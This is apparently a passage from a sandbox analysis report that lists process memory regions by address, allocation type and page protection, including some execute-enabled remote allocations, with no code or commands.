trusted library allocation
|
page read and write
|
||
|
7C2B000
|
stack
|
page read and write
|
||
|
8BB0000
|
trusted library allocation
|
page read and write
|
||
|
8710000
|
direct allocation
|
page read and write
|
||
|
18BDA92A000
|
heap
|
page read and write
|
||
|
18BDC6DD000
|
heap
|
page read and write
|
||
|
7845000
|
heap
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
1CA44C80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
8853000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
18BDA88D000
|
heap
|
page read and write
|
||
|
1CA4731B000
|
trusted library allocation
|
page read and write
|
||
|
88A3000
|
heap
|
page read and write
|
||
|
F7748D000
|
stack
|
page read and write
|
||
|
1CA485CE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B986000
|
trusted library allocation
|
page read and write
|
||
|
1CA467C0000
|
heap
|
page read and write
|
||
|
5F2C000
|
remote allocation
|
page execute and read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA5EE5F000
|
heap
|
page read and write
|
||
|
8CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CA470BB000
|
trusted library allocation
|
page read and write
|
||
|
18BDC708000
|
heap
|
page read and write
|
||
|
1CA474E9000
|
trusted library allocation
|
page read and write
|
||
|
7DF480510000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
7B0D000
|
stack
|
page read and write
|
||
|
1CA5EE8D000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FE5000
|
trusted library allocation
|
page read and write
|
||
|
882D000
|
heap
|
page read and write
|
||
|
F763FF000
|
stack
|
page read and write
|
||
|
1CA44CA0000
|
heap
|
page read and write
|
||
|
1CA44E75000
|
heap
|
page read and write
|
||
|
E69C000
|
direct allocation
|
page execute and read and write
|
||
|
347B000
|
heap
|
page read and write
|
||
|
1CA468C7000
|
heap
|
page execute and read and write
|
||
|
18BDA92B000
|
heap
|
page read and write
|
||
|
692C000
|
remote allocation
|
page execute and read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
30B5000
|
heap
|
page read and write
|
||
|
C89C000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B9B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C90000
|
heap
|
page read and write
|
||
|
7968000
|
trusted library allocation
|
page read and write
|
||
|
1CA46DB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAB2000
|
trusted library allocation
|
page read and write
|
||
|
18BDC5D4000
|
heap
|
page read and write
|
||
|
320A000
|
heap
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
868E000
|
stack
|
page read and write
|
||
|
18BDA918000
|
heap
|
page read and write
|
||
|
6784FE000
|
stack
|
page read and write
|
||
|
1CA5EE20000
|
heap
|
page read and write
|
||
|
552C000
|
remote allocation
|
page execute and read and write
|
||
|
23EE0000
|
remote allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
3390000
|
trusted library section
|
page read and write
|
||
|
8750000
|
direct allocation
|
page read and write
|
||
|
8700000
|
trusted library allocation
|
page read and write
|
||
|
1CA44D2E000
|
heap
|
page read and write
|
||
|
7340000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
732C000
|
remote allocation
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
4B2C000
|
remote allocation
|
page execute and read and write
|
||
|
18BDC5E8000
|
heap
|
page read and write
|
||
|
95F0000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
18BDA88D000
|
heap
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
1CA467DD000
|
heap
|
page read and write
|
||
|
77DC000
|
heap
|
page read and write
|
||
|
23F5F000
|
stack
|
page read and write
|
||
|
6787FE000
|
stack
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page read and write
|
||
|
345E000
|
stack
|
page read and write
|
||
|
880F000
|
heap
|
page read and write
|
||
|
4C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
18BDC5E2000
|
heap
|
page read and write
|
||
|
1CA44D35000
|
heap
|
page read and write
|
||
|
18BDA94A000
|
heap
|
page read and write
|
||
|
1CA4859D000
|
trusted library allocation
|
page read and write
|
||
|
1CA46DAD000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
heap
|
page execute and read and write
|
||
|
7350000
|
direct allocation
|
page read and write
|
||
|
8770000
|
direct allocation
|
page read and write
|
||
|
18BDA88D000
|
heap
|
page read and write
|
||
|
7FFD9B8EB000
|
trusted library allocation
|
page read and write
|
||
|
33B0000
|
trusted library allocation
|
page read and write
|
||
|
8773000
|
heap
|
page read and write
|
||
|
18BDA780000
|
heap
|
page read and write
|
||
|
1CA46E1C000
|
trusted library allocation
|
page read and write
|
||
|
1CA5ED20000
|
heap
|
page read and write
|
||
|
889B000
|
heap
|
page read and write
|
||
|
1CA46E18000
|
trusted library allocation
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
18BDC70B000
|
heap
|
page read and write
|
||
|
18BDA940000
|
heap
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
77C3000
|
heap
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page read and write
|
||
|
1CA5EEDC000
|
heap
|
page read and write
|
||
|
1CA4681C000
|
heap
|
page read and write
|
||
|
8785000
|
heap
|
page read and write
|
||
|
87A4000
|
heap
|
page read and write
|
||
|
88AC000
|
heap
|
page read and write
|
||
|
23B6D000
|
stack
|
page read and write
|
||
|
4E0E000
|
stack
|
page read and write
|
||
|
1CA485A1000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA8A000
|
trusted library allocation
|
page read and write
|
||
|
F7637C000
|
stack
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page read and write
|
||
|
23CEF000
|
stack
|
page read and write
|
||
|
1CA467B0000
|
heap
|
page read and write
|
||
|
88A8000
|
heap
|
page read and write
|
||
|
7950000
|
heap
|
page execute and read and write
|
||
|
F768BE000
|
stack
|
page read and write
|
||
|
23D7F000
|
stack
|
page read and write
|
||
|
889C000
|
heap
|
page read and write
|
||
|
678AFE000
|
stack
|
page read and write
|
||
|
33C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
1CA44C00000
|
heap
|
page read and write
|
||
|
5E41000
|
trusted library allocation
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
89D0000
|
heap
|
page read and write
|
||
|
412C000
|
remote allocation
|
page execute and read and write
|
||
|
18BDC71F000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B98C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1CA56941000
|
trusted library allocation
|
page read and write
|
||
|
1CA46678000
|
heap
|
page read and write
|
||
|
88A7000
|
heap
|
page read and write
|
||
|
7360000
|
direct allocation
|
page read and write
|
||
|
18BDC713000
|
heap
|
page read and write
|
||
|
18BDA87A000
|
heap
|
page read and write
|
||
|
4D1E000
|
stack
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
23BAE000
|
stack
|
page read and write
|
||
|
1CA56C09000
|
trusted library allocation
|
page read and write
|
||
|
1CA44D8A000
|
heap
|
page read and write
|
||
|
18BDC630000
|
heap
|
page read and write
|
||
|
33A0000
|
trusted library section
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
4CDC000
|
stack
|
page read and write
|
||
|
F7758B000
|
stack
|
page read and write
|
||
|
F765BE000
|
stack
|
page read and write
|
||
|
4E41000
|
trusted library allocation
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
6783FE000
|
stack
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
1CA44D07000
|
heap
|
page read and write
|
||
|
F76636000
|
stack
|
page read and write
|
||
|
889B000
|
heap
|
page read and write
|
||
|
77DE000
|
heap
|
page read and write
|
||
|
1CA46DC7000
|
trusted library allocation
|
page read and write
|
||
|
31ED000
|
heap
|
page read and write
|
||
|
23CAE000
|
stack
|
page read and write
|
||
|
18BDC601000
|
heap
|
page read and write
|
||
|
1CA44B00000
|
heap
|
page read and write
|
||
|
1CA44CEF000
|
heap
|
page read and write
|
||
|
1CA44EC5000
|
heap
|
page read and write
|
||
|
33C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F769BB000
|
stack
|
page read and write
|
||
|
8720000
|
direct allocation
|
page read and write
|
||
|
18BDC6EC000
|
heap
|
page read and write
|
||
|
7FFD9B8DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
87CA000
|
heap
|
page read and write
|
||
|
7FFD9BA81000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
F75FFE000
|
stack
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
7F0D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
18BDC5EB000
|
heap
|
page read and write
|
||
|
5EA6000
|
trusted library allocation
|
page read and write
|
||
|
372C000
|
remote allocation
|
page execute and read and write
|
||
|
678DFB000
|
stack
|
page read and write
|
||
|
1CA46887000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
1CA48576000
|
trusted library allocation
|
page read and write
|
||
|
23EE0000
|
remote allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
8700000
|
direct allocation
|
page read and write
|
||
|
1CA5EED8000
|
heap
|
page read and write
|
||
|
18BDA918000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
23D3E000
|
stack
|
page read and write
|
||
|
23DD0000
|
heap
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page read and write
|
||
|
6789FD000
|
stack
|
page read and write
|
||
|
7D2C000
|
remote allocation
|
page execute and read and write
|
||
|
1CA468E0000
|
heap
|
page read and write
|
||
|
1CA44DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CA44E30000
|
trusted library allocation
|
page read and write
|
||
|
8853000
|
heap
|
page read and write
|
||
|
B49C000
|
direct allocation
|
page execute and read and write
|
||
|
1CA4857B000
|
trusted library allocation
|
page read and write
|
||
|
D29C000
|
direct allocation
|
page execute and read and write
|
||
|
2C7B000
|
stack
|
page read and write
|
||
|
18BDA94A000
|
heap
|
page read and write
|
||
|
18BDC6D0000
|
heap
|
page read and write
|
||
|
1CA4858E000
|
trusted library allocation
|
page read and write
|
||
|
1CA56930000
|
trusted library allocation
|
page read and write
|
||
|
1CA46D99000
|
trusted library allocation
|
page read and write
|
||
|
8740000
|
heap
|
page read and write
|
||
|
18BDA88F000
|
heap
|
page read and write
|
||
|
18BDA850000
|
heap
|
page read and write
|
||
|
1CA5EED0000
|
heap
|
page read and write
|
||
|
8798000
|
heap
|
page read and write
|
||
|
F767BE000
|
stack
|
page read and write
|
||
|
18BDA8E0000
|
heap
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
4D38000
|
heap
|
page read and write
|
||
|
6782FA000
|
stack
|
page read and write
|
||
|
7862000
|
heap
|
page read and write
|
||
|
1CA5EED4000
|
heap
|
page read and write
|
||
|
969C000
|
direct allocation
|
page execute and read and write
|
||
|
33F2000
|
trusted library allocation
|
page read and write
|
||
|
23FF5000
|
direct allocation
|
page read and write
|
||
|
1CA48591000
|
trusted library allocation
|
page read and write
|
||
|
F7740F000
|
stack
|
page read and write
|
||
|
1CA44C40000
|
heap
|
page read and write
|
||
|
678BFE000
|
stack
|
page read and write
|
||
|
88A3000
|
heap
|
page read and write
|
||
|
18BDA918000
|
heap
|
page read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
86F0000
|
direct allocation
|
page read and write
|
||
|
1CA56921000
|
trusted library allocation
|
page read and write
|
||
|
1CA44E70000
|
heap
|
page read and write
|
||
|
4C5F000
|
stack
|
page read and write
|
||
|
18BDC601000
|
heap
|
page read and write
|
||
|
8859000
|
heap
|
page read and write
|
||
|
18BDC601000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
77CB000
|
heap
|
page read and write
|
||
|
678CFF000
|
stack
|
page read and write
|
||
|
86A0000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
18BDA918000
|
heap
|
page read and write
|
||
|
18BDC5D8000
|
heap
|
page read and write
|
||
|
1CA46DA2000
|
trusted library allocation
|
page read and write
|
||
|
18BDC6EA000
|
heap
|
page read and write
|
||
|
6786FF000
|
stack
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB5000
|
trusted library allocation
|
page read and write
|
||
|
8894000
|
heap
|
page read and write
|
||
|
74A0000
|
heap
|
page read and write
|
||
|
1CA44CF3000
|
heap
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BD0000
|
trusted library allocation
|
page read and write
|
||
|
1CA5EE48000
|
heap
|
page read and write
|
||
|
574F000
|
trusted library allocation
|
page read and write
|
||
|
8615000
|
heap
|
page read and write
|
||
|
33C4000
|
trusted library allocation
|
page read and write
|
||
|
8856000
|
heap
|
page read and write
|
||
|
8610000
|
heap
|
page read and write
|
||
|
18BDA879000
|
heap
|
page read and write
|
||
|
7796000
|
heap
|
page read and write
|
||
|
87A0000
|
heap
|
page read and write
|
||
|
1CA48723000
|
trusted library allocation
|
page read and write
|
||
|
18BDA93C000
|
heap
|
page read and write
|
||
|
18BDA946000
|
heap
|
page read and write
|
||
|
7390000
|
direct allocation
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
1CA4860C000
|
trusted library allocation
|
page read and write
|
||
|
86E0000
|
direct allocation
|
page read and write
|
||
|
88B2000
|
heap
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
23FF0000
|
heap
|
page read and write
|
||
|
1CA4880A000
|
trusted library allocation
|
page read and write
|
||
|
23FED000
|
stack
|
page read and write
|
||
|
18BDA926000
|
heap
|
page read and write
|
||
|
8C80000
|
direct allocation
|
page read and write
|
||
|
18BDA944000
|
heap
|
page read and write
|
||
|
1CA47507000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
heap
|
page readonly
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
864E000
|
stack
|
page read and write
|
||
|
18BDC5D1000
|
heap
|
page read and write
|
||
|
DC9C000
|
direct allocation
|
page execute and read and write
|
||
|
7295000
|
heap
|
page execute and read and write
|
||
|
1CA44D52000
|
heap
|
page read and write
|
||
|
71BF000
|
stack
|
page read and write
|
||
|
85B7000
|
stack
|
page read and write
|
||
|
8BC0000
|
trusted library allocation
|
page read and write
|
||
|
4C68000
|
trusted library allocation
|
page read and write
|
||
|
18BDC190000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
18BDC5E4000
|
heap
|
page read and write
|
||
|
1CA48610000
|
trusted library allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
F75F7E000
|
stack
|
page read and write
|
||
|
1CA46DA5000
|
trusted library allocation
|
page read and write
|
||
|
4D20000
|
trusted library allocation
|
page read and write
|
||
|
8ACC000
|
stack
|
page read and write
|
||
|
18BDC5F4000
|
heap
|
page read and write
|
||
|
1CA44DA0000
|
trusted library allocation
|
page read and write
|
||
|
18BDC70E000
|
heap
|
page read and write
|
||
|
1CA44D64000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
18BDA87F000
|
heap
|
page read and write
|
||
|
8859000
|
heap
|
page read and write
|
||
|
4EA2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
4F98000
|
trusted library allocation
|
page read and write
|
||
|
18BDC5D2000
|
heap
|
page read and write
|
||
|
1CA46DC5000
|
trusted library allocation
|
page read and write
|
||
|
18BDA922000
|
heap
|
page read and write
|
||
|
1CA44DF0000
|
trusted library allocation
|
page read and write
|
||
|
8CF0000
|
direct allocation
|
page read and write
|
||
|
1CA48623000
|
trusted library allocation
|
page read and write
|
||
|
31FD000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page read and write
|
||
|
18BDA946000
|
heap
|
page read and write
|
||
|
1CA44DB0000
|
heap
|
page readonly
|
||
|
1CA47E40000
|
trusted library allocation
|
page read and write
|
||
|
5E69000
|
trusted library allocation
|
page read and write
|
||
|
1CA468C0000
|
heap
|
page execute and read and write
|
||
|
F766B9000
|
stack
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
F7647E000
|
stack
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
F7693E000
|
stack
|
page read and write
|
||
|
18BDA8B1000
|
heap
|
page read and write
|
||
|
1CA44CAD000
|
heap
|
page read and write
|
||
|
18BDA94A000
|
heap
|
page read and write
|
||
|
883A000
|
heap
|
page read and write
|
||
|
23FAC000
|
stack
|
page read and write
|
||
|
18BDA6A0000
|
heap
|
page read and write
|
||
|
18BDC601000
|
heap
|
page read and write
|
||
|
23B2F000
|
stack
|
page read and write
|
||
|
1CA44CCD000
|
heap
|
page read and write
|
||
|
23C2C000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1CA46FEB000
|
trusted library allocation
|
page read and write
|
||
|
18BDA87E000
|
heap
|
page read and write
|
||
|
1CA474E2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
8740000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
F76577000
|
stack
|
page read and write
|
||
|
2C3C000
|
stack
|
page read and write
|
||
|
1CA46780000
|
heap
|
page execute and read and write
|
||
|
31FB000
|
heap
|
page read and write
|
||
|
18BDC5DB000
|
heap
|
page read and write
|
||
|
7FFD9BAB7000
|
trusted library allocation
|
page read and write
|
||
|
1CA46910000
|
heap
|
page execute and read and write
|
||
|
F75EF3000
|
stack
|
page read and write
|
||
|
1CA44BE0000
|
heap
|
page read and write
|
||
|
1CA484CB000
|
trusted library allocation
|
page read and write
|
||
|
18BDA92D000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
31E1000
|
heap
|
page read and write
|
||
|
2C80000
|
remote allocation
|
page execute and read and write
|
||
|
18BDC5F7000
|
heap
|
page read and write
|
||
|
33D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page execute and read and write
|
||
|
771E000
|
stack
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
18BDA7A0000
|
heap
|
page read and write
|
||
|
18BDA91B000
|
heap
|
page read and write
|
||
|
23EE0000
|
remote allocation
|
page read and write
|
||
|
884B000
|
heap
|
page read and write
|
||
|
18BDA8B1000
|
heap
|
page read and write
|
There are 482 hidden memdumps, click here to show them.